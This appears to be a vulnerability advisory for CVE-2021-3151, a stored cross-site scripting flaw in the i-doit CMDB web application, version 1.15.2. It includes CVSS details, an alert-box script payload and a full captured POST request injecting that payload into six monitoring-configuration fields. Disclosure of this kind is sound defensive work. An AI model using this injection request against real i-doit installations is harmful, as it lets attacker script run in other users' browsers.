Vendor | |
Product | i-doit |
Affected Version(s) | 1.15.2 and probably prior and probably prior |
Tested Version(s) | 1.15.2 |
Vendor Notification | 15 December 2020 |
Advisory Publication | 15 December 2020 [without technical details] |
Vendor Fix | 1.16.0 |
Public Disclosure | 25 February 2021 |
Latest Modification | 25 February 2021 |
CVE Identifier | CVE-2021-3151 |
Product Description | i-doit is a web based IT documentation and CMDB. i-doit documents IT-systems and their changes, defines emergency plans, displays vital information and helps to ensure a stable and efficient IT operation. |
Credits | Carlos Ramírez L. Security Researcher & Penetration Tester @wizlynx group |
Stored Cross-Site Scripting (XSS) Vulnerability | |||
Severity: Medium | CVSS Score: 5.4 | CWE-ID: CWE-79 | Status: Open |
Vulnerability Description | |||
The i-doit web application is affected by Stored Cross-Site Scripting (XSS) vulnerability affecting version 1.15.2 and probably prior versions. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. | |||
CVSS Base Score | |||
Attack Vector | Network | Scope | Changed |
Attack Complexity | Low | Confidentiality Impact | Low |
Privileges Required | Low | Integrity Impact | Low |
User Interaction | Required | Availability Impact | None |
The application
i-doit has six variables that are vulnerable to Stored Cross-Site Scripting (XSS) due to the
lack of input validation and output encoding.
The value of the
app request parameter is copied into the value of a Javascript. The payload <script>alert(“XSS”)</script>
was submitted in the app parameters “C__MONITORING__CONFIG__TITLE”, “SM2__C__MONITORING__CONFIG__TITLE[p_strValue]”,
“C__MONITORING__CONFIG__PATH”, “SM2__C__MONITORING__CONFIG__PATH[p_strValue]”, “C__MONITORING__CONFIG__ADDRESS”,
“SM2__C__MONITORING__CONFIG__ADDRESS[p_strValue]”, the following screenshot
shows the affected parameters:
This input was
echoed unmodified in the application's response resulting in a Stored Cross-Site
Scripting (see request below).
POST /idoit-open-1.15.2/?call=category&moduleID=8&moduleSubID=1019&pID=export_config&treeNode=10191&page=1&filtered=1&tableFilter[isys_monitoring_export_config__id]=9&tableFilter[operation]=-1&scoped=0&navMode=2&id=9&&ajax=1 HTTP/1.1
Host: 192.168.1.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.7,th;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.129/idoit-open-1.15.2/?call=category&moduleID=8&moduleSubID=1019&pID=export_config&treeNode=10191&page=1&filtered=1&tableFilter%5Bisys_monitoring_export_config__id%5D=9&tableFilter%5Boperation%5D=-1&scoped=0&navMode=2&&id=9
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.3
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-i-doit-Tenant-Id: 1
Content-Length: 5556
Connection: close
Cookie: PHPSESSID=g5qnbmhd59ja86853fhk5k2r6i
navMode=10&sort=&dir=&id=&navPageStart=&navTemplateDetailView=&template=&useTemplate=&popupReceiver=&_csrf_token=&q=&submit_isys_form=&config_id=9&SM2__config_id%5Bp_strValue%5D=9&SM2__config_id%5Bp_bDisabled%5D=&SM2__config_id%5Btype%5D=f_text&SM2__C__MONITORING__CONFIG__TITLE%5Btype%5D=f_label&SM2__C__MONITORING__CONFIG__TITLE%5Btype%5D=f_text&C__MONITORING__CONFIG__TITLE=Title%3Cscript%3Ealert(%22XSS+1%22)%3C%2Fscript%3E&SM2__C__MONITORING__CONFIG__TITLE%5Bp_strValue%5D=Title%3Cscript%3Ealert(%22XSS+1%22)%3C%2Fscript%3E&SM2__C__MONITORING__CONFIG__TITLE%5Bp_bDisabled%5D=&SM2__C__MONITORING__CONFIG__PATH%5Btype%5D=f_label&SM2__C__MONITORING__CONFIG__PATH%5Btype%5D=f_text&C__MONITORING__CONFIG__PATH=Title%3Cscript%3Ealert(%22XSS+2%22)%3C%2Fscript%3E&SM2__C__MONITORING__CONFIG__PATH%5Bp_strValue%5D=Title%3Cscript%3Ealert(%22XSS+2%22)%3C%2Fscript%3E&SM2__C__MONITORING__CONFIG__PATH%5Bp_bDisabled%5D=&SM2__C__MONITORING__CONFIG__ADDRESS%5Btype%5D=f_label&SM2__C__MONITORING__CONFIG__ADDRESS%5Btype%5D=f_text&C__MONITORING__CONFIG__ADDRESS=Title%3Cscript%3Ealert(%22XSS+3%22)%3C%2Fscript%3E&SM2__C__MONITORING__CONFIG__ADDRESS%5Bp_strValue%5D=Title%3Cscript%3Ealert(%22XSS+3%22)%3C%2Fscript%3E&SM2__C__MONITORING__CONFIG__ADDRESS%5Bp_bDisabled%5D=&SM2__C__MONITORING__MONITORING_TYPE%5Btype%5D=f_label&SM2__C__MONITORING__MONITORING_TYPE%5Btype%5D=f_dialog&C__MONITORING__MONITORING_TYPE=check_mk&SM2__C__MONITORING__MONITORING_TYPE%5Bp_strSelectedID%5D=check_mk&SM2__C__MONITORING__MONITORING_TYPE%5Bp_strTable%5D=&SM2__C__MONITORING__MONITORING_TYPE%5Bp_arData%5D=a%3A2%3A%7Bs%3A8%3A%22check_mk%22%3Bs%3A8%3A%22Check_MK%22%3Bs%3A6%3A%22nagios%22%3Bs%3A6%3A%22Nagios%22%3B%7D&SM2__C__MONITORING__CHECK_MK__ROLE_EXPORT%5Btype%5D=f_label&SM2__C__MONITORING__CHECK_MK__ROLE_EXPORT%5Btype%5D=f_dialog_list&C__MONITORING__CHECK_MK__ROLE_EXPORT__selected_values=&SM2__C__MONITORING__CHECK_MK__ROLE_EXPORT%5Bp_strSelectedID%5D=&SM2__C__MONITORING__CHECK_MK__ROLE_EXPORT%5Bp_arData%5D=a%3A9%3A%7Bi%3A1%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22val%22%3Bs%3A13%3A%22Administrator%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A2%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%222%22%3Bs%3A3%3A%22val%22%3Bs%3A4%3A%22User%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A3%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%223%22%3Bs%3A3%3A%22val%22%3Bs%3A8%3A%22Supplier%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A4%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%224%22%3Bs%3A3%3A%22val%22%3Bs%3A21%3A%22Place+of+Jurisdiction%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A5%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%225%22%3Bs%3A3%3A%22val%22%3Bs%3A15%3A%22Contact+partner%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A6%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%226%22%3Bs%3A3%3A%22val%22%3Bs%3A19%3A%22Contracting+parties%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A7%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%227%22%3Bs%3A3%3A%22val%22%3Bs%3A13%3A%22Notifications%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A9%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%229%22%3Bs%3A3%3A%22val%22%3Bs%3A15%3A%22Service+Manager%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7Di%3A10%3Ba%3A3%3A%7Bs%3A2%3A%22id%22%3Bs%3A2%3A%2210%22%3Bs%3A3%3A%22val%22%3Bs%3A10%3A%22Monitoring%22%3Bs%3A3%3A%22sel%22%3Bb%3A0%3B%7D%7D&SM2__C__MONITORING__CHECK_MK__SITE%5Btype%5D=f_label&SM2__C__MONITORING__CHECK_MK__SITE%5Btype%5D=f_text&C__MONITORING__CHECK_MK__SITE=&SM2__C__MONITORING__CHECK_MK__SITE%5Bp_strValue%5D=&SM2__C__MONITORING__CHECK_MK__SITE%5Bp_bDisabled%5D=&SM2__C__MONITORING__CHECK_MK__MULTISITE%5Btype%5D=f_label&SM2__C__MONITORING__CHECK_MK__MULTISITE%5Btype%5D=f_dialog&C__MONITORING__CHECK_MK__MULTISITE=0&SM2__C__MONITORING__CHECK_MK__MULTISITE%5Bp_strSelectedID%5D=0&SM2__C__MONITORING__CHECK_MK__MULTISITE%5Bp_strTable%5D=&SM2__C__MONITORING__CHECK_MK__MULTISITE%5Bp_arData%5D=a%3A2%3A%7Bi%3A1%3Bs%3A3%3A%22Yes%22%3Bi%3A0%3Bs%3A2%3A%22No%22%3B%7D&SM2__C__MONITORING__CHECK_MK__LOCK_HOSTS%5Btype%5D=f_label&SM2__C__MONITORING__CHECK_MK__LOCK_HOSTS%5Btype%5D=f_dialog&C__MONITORING__CHECK_MK__LOCK_HOSTS=1&SM2__C__MONITORING__CHECK_MK__LOCK_HOSTS%5Bp_strSelectedID%5D=1&SM2__C__MONITORING__CHECK_MK__LOCK_HOSTS%5Bp_strTable%5D=&SM2__C__MONITORING__CHECK_MK__LOCK_HOSTS%5Bp_arData%5D=a%3A2%3A%7Bi%3A1%3Bs%3A3%3A%22Yes%22%3Bi%3A0%3Bs%3A2%3A%22No%22%3B%7D&SM2__C__MONITORING__CHECK_MK__LOCK_FOLDERS%5Btype%5D=f_label&SM2__C__MONITORING__CHECK_MK__LOCK_FOLDERS%5Btype%5D=f_dialog&C__MONITORING__CHECK_MK__LOCK_FOLDERS=1&SM2__C__MONITORING__CHECK_MK__LOCK_FOLDERS%5Bp_strSelectedID%5D=1&SM2__C__MONITORING__CHECK_MK__LOCK_FOLDERS%5Bp_strTable%5D=&SM2__C__MONITORING__CHECK_MK__LOCK_FOLDERS%5Bp_arData%5D=a%3A2%3A%7Bi%3A1%3Bs%3A3%3A%22Yes%22%3Bi%3A0%3Bs%3A2%3A%22No%22%3B%7D&SM2__C__MONITORING__CHECK_MK__MASTER_SITE%5Btype%5D=f_label&SM2__C__MONITORING__CHECK_MK__MASTER_SITE%5Btype%5D=f_dialog&C__MONITORING__CHECK_MK__MASTER_SITE=-1&SM2__C__MONITORING__CHECK_MK__MASTER_SITE%5Bp_strSelectedID%5D=-1&SM2__C__MONITORING__CHECK_MK__MASTER_SITE%5Bp_strTable%5D=&SM2__C__MONITORING__CHECK_MK__MASTER_SITE%5Bp_arData%5D=a%3A1%3A%7Bi%3A5%3Bs%3A5%3A%22Title%22%3B%7D&SM2__C__MONITORING__CHECK_MK__UTF8DECODE_EXPORT%5Btype%5D=f_label&SM2__C__MONITORING__CHECK_MK__UTF8DECODE_EXPORT%5Btype%5D=f_dialog&C__MONITORING__CHECK_MK__UTF8DECODE_EXPORT=1&SM2__C__MONITORING__CHECK_MK__UTF8DECODE_EXPORT%5Bp_strSelectedID%5D=1&SM2__C__MONITORING__CHECK_MK__UTF8DECODE_EXPORT%5Bp_strTable%5D=&SM2__C__MONITORING__CHECK_MK__UTF8DECODE_EXPORT%5Bp_arData%5D=a%3A2%3A%7Bi%3A1%3Bs%3A3%3A%22Yes%22%3Bi%3A0%3Bs%3A2%3A%22No%22%3B%7D&LogbookCommentary=
The following screenshot shows the
JavaScript being executed on the client side: